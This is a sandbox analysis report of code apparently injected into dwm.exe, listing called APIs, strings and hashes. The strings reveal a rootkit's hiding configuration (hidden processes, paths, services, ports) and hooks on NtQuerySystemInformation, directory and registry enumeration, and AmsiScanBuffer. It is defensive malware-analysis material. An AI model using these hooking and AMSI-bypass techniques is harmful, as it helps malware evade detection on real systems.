Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	111
Total number of Limit Nodes:	17

Executed Functions

Function 00000262F1C92C80 Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00000262F1C92CAD
TlsGetValue.KERNEL32 ref: 00000262F1C92CBC
TlsGetValue.KERNEL32 ref: 00000262F1C92CCB
NtEnumerateValueKey.NTDLL ref: 00000262F1C92D40
NtEnumerateValueKey.NTDLL ref: 00000262F1C92D76
NtEnumerateValueKey.NTDLL ref: 00000262F1C92DB3
TlsSetValue.KERNEL32 ref: 00000262F1C92E0F
TlsSetValue.KERNEL32 ref: 00000262F1C92E1E
TlsSetValue.KERNEL32 ref: 00000262F1C92E2D

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Value$Enumerate
String ID:
API String ID: 3520290360-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 3cde0a9a3dbcaa3e8b6a5bb1a9bfd7b4507eb1456a8fe0009fb906c1fcea421b
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 90518136214A61C7E365CB15A46C75AB7B0F788B84FD04139DE8A43FD8DB3AC949CB02

Function 00000262F1C91724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000262F1C9172F
HeapAlloc.KERNEL32 ref: 00000262F1C9173E

Part of subcall function 00000262F1C91264: GetProcessHeap.KERNEL32 ref: 00000262F1C9126A
Part of subcall function 00000262F1C91264: HeapAlloc.KERNEL32 ref: 00000262F1C91279
Part of subcall function 00000262F1C91264: GetProcessHeap.KERNEL32 ref: 00000262F1C91293
Part of subcall function 00000262F1C91264: HeapAlloc.KERNEL32 ref: 00000262F1C912A4

Part of subcall function 00000262F1C91000: GetProcessHeap.KERNEL32 ref: 00000262F1C91006
Part of subcall function 00000262F1C91000: HeapAlloc.KERNEL32 ref: 00000262F1C91015
Part of subcall function 00000262F1C91000: GetProcessHeap.KERNEL32 ref: 00000262F1C91028
Part of subcall function 00000262F1C91000: HeapAlloc.KERNEL32 ref: 00000262F1C91037

RegOpenKeyExW.KERNELBASE ref: 00000262F1C917AE
RegOpenKeyExW.KERNELBASE ref: 00000262F1C917DB
RegCloseKey.ADVAPI32 ref: 00000262F1C917F5
RegOpenKeyExW.KERNELBASE ref: 00000262F1C91815
RegCloseKey.KERNELBASE ref: 00000262F1C91830
RegOpenKeyExW.KERNELBASE ref: 00000262F1C91850
RegCloseKey.ADVAPI32 ref: 00000262F1C9186B
RegOpenKeyExW.KERNELBASE ref: 00000262F1C9188B
RegCloseKey.ADVAPI32 ref: 00000262F1C918A6
RegOpenKeyExW.KERNELBASE ref: 00000262F1C918C6
RegCloseKey.ADVAPI32 ref: 00000262F1C918E1
RegOpenKeyExW.KERNELBASE ref: 00000262F1C91901
RegCloseKey.KERNELBASE ref: 00000262F1C9191C
RegOpenKeyExW.KERNELBASE ref: 00000262F1C9193C
RegCloseKey.ADVAPI32 ref: 00000262F1C91957
RegOpenKeyExW.KERNELBASE ref: 00000262F1C91977
RegCloseKey.ADVAPI32 ref: 00000262F1C91992
RegCloseKey.KERNELBASE ref: 00000262F1C9199C

Part of subcall function 00000262F1C912B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000262F1C91315
Part of subcall function 00000262F1C912B8: GetProcessHeap.KERNEL32 ref: 00000262F1C91323
Part of subcall function 00000262F1C912B8: HeapAlloc.KERNEL32 ref: 00000262F1C91334
Part of subcall function 00000262F1C912B8: RegEnumValueW.ADVAPI32 ref: 00000262F1C91393
Part of subcall function 00000262F1C912B8: GetProcessHeap.KERNEL32 ref: 00000262F1C913DB
Part of subcall function 00000262F1C912B8: HeapAlloc.KERNEL32 ref: 00000262F1C913E9
Part of subcall function 00000262F1C912B8: GetProcessHeap.KERNEL32 ref: 00000262F1C91406
Part of subcall function 00000262F1C912B8: HeapFree.KERNEL32 ref: 00000262F1C91414
Part of subcall function 00000262F1C912B8: lstrlenW.KERNEL32 ref: 00000262F1C9141D
Part of subcall function 00000262F1C912B8: GetProcessHeap.KERNEL32 ref: 00000262F1C9142B
Part of subcall function 00000262F1C912B8: HeapAlloc.KERNEL32 ref: 00000262F1C91439

Strings

pid, xrefs: 00000262F1C9180E
tcp_local, xrefs: 00000262F1C918FA
paths, xrefs: 00000262F1C91884
process_names, xrefs: 00000262F1C91849
udp, xrefs: 00000262F1C91970
startup, xrefs: 00000262F1C917D1
SOFTWARE\$nya-config, xrefs: 00000262F1C9178E
tcp_remote, xrefs: 00000262F1C91935
service_names, xrefs: 00000262F1C918BF

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: b66a87bf2abe2e6163f6f1e523dcfaff00ca37a94c1888edbb47774e79d68267
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 21711736310E60C5EB119F62E86D79927B4FB85F98FC05121DA4E47FA8DE36C448C741

Function 00000262F1C91E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000262F1C91E7F

Part of subcall function 00000262F1C922A8: GetModuleHandleA.KERNEL32(?,?,?,00000262F1C91EB1), ref: 00000262F1C922C0
Part of subcall function 00000262F1C922A8: GetProcAddress.KERNEL32(?,?,?,00000262F1C91EB1), ref: 00000262F1C922D1

CreateThread.KERNELBASE ref: 00000262F1C92043
TlsAlloc.KERNEL32 ref: 00000262F1C92049
TlsAlloc.KERNEL32 ref: 00000262F1C92055
TlsAlloc.KERNEL32 ref: 00000262F1C92061
TlsAlloc.KERNEL32 ref: 00000262F1C9206D
TlsAlloc.KERNEL32 ref: 00000262F1C92079
TlsAlloc.KERNEL32 ref: 00000262F1C92085

Strings

EnumServiceGroupW, xrefs: 00000262F1C91F50
pdh.dll, xrefs: 00000262F1C91FD7, 00000262F1C91FF8
NtEnumerateValueKey, xrefs: 00000262F1C91F36
NtResumeThread, xrefs: 00000262F1C91EC2
PdhGetRawCounterArrayW, xrefs: 00000262F1C91FD0
NtQueryDirectoryFileEx, xrefs: 00000262F1C91EFC
advapi32.dll, xrefs: 00000262F1C91F57, 00000262F1C91F78
AmsiScanBuffer, xrefs: 00000262F1C92012
ntdll.dll, xrefs: 00000262F1C91E8D
NtEnumerateKey, xrefs: 00000262F1C91F19
PdhGetFormattedCounterArrayW, xrefs: 00000262F1C91FF1
NtDeviceIoControlFile, xrefs: 00000262F1C91FB6
EnumServicesStatusExW, xrefs: 00000262F1C91F71, 00000262F1C91F92
NtQuerySystemInformation, xrefs: 00000262F1C91EA5
amsi.dll, xrefs: 00000262F1C92019
sechost.dll, xrefs: 00000262F1C91F99
NtQueryDirectoryFile, xrefs: 00000262F1C91EDF

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 0b42d8ed8c7acc2e221219a9bc6ed5a4b99f96483b638c3f5803d7d084d0dba7
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 9E519AB0510E6AE5FB02EBA4EC6C7D42B30A740B98FC04537954942DE9DE3A825EC387

Function 00000262F1C9EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000262F1C9F34A,?,?,00000000,00000262F1C9F2CD), ref: 00000262F1C9EFF5
GetLastError.KERNEL32(?,?,00000000,00000262F1C9F2CD), ref: 00000262F1C9F007
LoadLibraryExW.KERNEL32(?,?,00000000,00000262F1C9F2CD), ref: 00000262F1C9F049
VirtualProtect.KERNELBASE ref: 00000262F1C9F0A5
VirtualProtect.KERNEL32 ref: 00000262F1C9F0D6
FreeLibrary.KERNEL32(?,?,00000000,00000262F1C9F2CD), ref: 00000262F1C9F11A
GetProcAddress.KERNEL32(?,?,00000000,00000262F1C9F2CD), ref: 00000262F1C9F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 00000262F1C9F157, 00000262F1C9F165
api-ms-, xrefs: 00000262F1C9F01B
ext-ms-, xrefs: 00000262F1C9F02E

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 5b6f95975762b6659832d5e0f0759809e8599dee62c6ca146bec9c7d5dcf177c
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 0151C431700F64D1EA199B56A82C3A92B70BB49BB0FD847359E3D47BD4DF3AD4098742

Function 00000262F1C96270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000262F1C962AB
GetThreadContext.KERNEL32 ref: 00000262F1C96415

Part of subcall function 00000262F1C960A0: GetCurrentThreadId.KERNEL32 ref: 00000262F1C960A4

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
Instruction ID: c1c2ec9b84daf45c34f4e86823dcf7442cccecd9bf3cfca93e1928349ca1aafe
Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
Instruction Fuzzy Hash: 42D17E76205FA8C1DA70DB16E4A835A7BB0F388B88F910126DACD47BE9DF39C555CB01

Function 00000262F1C91E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000262F1C91E47
GetProcAddress.KERNEL32 ref: 00000262F1C91E57
SleepEx.KERNELBASE ref: 00000262F1C91E67

Strings

AmsiScanBuffer, xrefs: 00000262F1C91E50
amsi.dll, xrefs: 00000262F1C91E40

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: d6eef7045076ac9cf124b26653fba54614d86aa3dc1f6a9fdf0b9f54d317be12
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 93D06734651E20E5FA0A6B11E87D3653271BB65F41FC44435C60A01AE4DE2E895DD742

Function 00000262F1C95810 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000262F1C95896

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
Instruction ID: b306ee0a4e48fbe2017bb3906ee44052a6ce1d131a3da1e4b3903ba443df59dd
Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
Instruction Fuzzy Hash: 07029A32119B94C6E760CB55F49835ABBB0F385794F904126EA8E87FA8DB7EC458CF01

Function 00000262F1C93EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F68

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 41ad1d7497232c222a08116fe1182cf171a95b5ef2bd5ba6334f81b7dc962d0b
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 26112E36605B50D3EB258B61E41C31A67B0FB45B80F844036DA9D03BD8EB7EC958C785

Function 00000262F20A2EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000262F20A2F7B
VirtualProtect.KERNELBASE ref: 00000262F20A2FA5
LoadLibraryA.KERNELBASE ref: 00000262F20A302E
VirtualProtect.KERNELBASE ref: 00000262F20A31C2

Memory Dump Source

Source File: 0000000E.00000003.1574397237.00000262F20A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F20A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f20a0000_dwm.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 3bfd93b4f68ccc403cd171713a284d1eaae66b2d477bb8876fa4c4d11fad0ae8
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: FF916973B02A50C7DB508F65D4A8B7DB3A1F725B98F8480299F4907F88DA3ED806CB40

Function 00000262F1DC2EBC Relevance: 4.7, APIs: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000262F1DC2F7B
VirtualProtect.KERNELBASE ref: 00000262F1DC2FA5
VirtualProtect.KERNELBASE ref: 00000262F1DC31C2

Memory Dump Source

Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 2b53b104534d931d9bbca92df6b7dd39c888927d9edc43f557f94db6afda7e75
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B991F673B11A60DBDB648F29D40CB6DB3B1F794B98F9486249E4947F88DA3AD816C700

Function 00000262F1CD2EBC Relevance: 4.7, APIs: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000262F1CD2F7B
VirtualProtect.KERNELBASE ref: 00000262F1CD2FA5
VirtualProtect.KERNELBASE ref: 00000262F1CD31C2

Memory Dump Source

Source File: 0000000E.00000003.1733412795.00000262F1CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1CD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1cd0000_dwm.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 59ea7243bf80c569789660e50a8d2276252486441d4de17b73a98efa3b3f7c3a
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 4A9115B2B01961C7DB548F29D40C76DB3B1F744B94F989134DE6A07BC8DA3AE816C701

Function 00000262F1C94120 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00000262F1C941A6
VirtualAlloc.KERNEL32 ref: 00000262F1C941E0

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction ID: c30f952ed72ae9ce0ef1c6df801ded334056910f438beab0216d37857a881daa
Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction Fuzzy Hash: 53313C32219E90C1EA34DA55E56C35A6AB4F398788FD00535A5CE46FECDF2EC198CB05

Function 00000262F1C93A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000262F1C93A35
PathFindFileNameW.SHLWAPI ref: 00000262F1C93A44

Part of subcall function 00000262F1C93F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1C9272F), ref: 00000262F1C93FA0

Part of subcall function 00000262F1C93EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93EDB
Part of subcall function 00000262F1C93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F0E
Part of subcall function 00000262F1C93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F2E
Part of subcall function 00000262F1C93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F47
Part of subcall function 00000262F1C93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1C93A5B), ref: 00000262F1C93F68

CreateThread.KERNELBASE ref: 00000262F1C93A8B

Part of subcall function 00000262F1C91E74: GetCurrentThread.KERNEL32 ref: 00000262F1C91E7F
Part of subcall function 00000262F1C91E74: CreateThread.KERNELBASE ref: 00000262F1C92043
Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92049
Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92055
Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92061
Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C9206D
Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92079
Part of subcall function 00000262F1C91E74: TlsAlloc.KERNEL32 ref: 00000262F1C92085

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: f08a503081193f604c2ddc071613d9d594e76e292e5a47b07e0559d39bf49dfb
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 79115E35A10E21D2FB60D7B0A56E3AD2AB1A794745FD06139D406C1DD8EF7FC44C8603

Function 00000262F1C95530 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00000262F1C95534
VirtualProtect.KERNEL32 ref: 00000262F1C95577
FlushInstructionCache.KERNEL32 ref: 00000262F1C9558C

Memory Dump Source

Source File: 0000000E.00000002.2912441197.00000262F1C91000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1C90000, based on PE: true

Associated: 0000000E.00000002.2912278794.00000262F1C90000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912618312.00000262F1CA5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912766923.00000262F1CB0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2912898322.00000262F1CB2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2913138789.00000262F1CB9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1c90000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
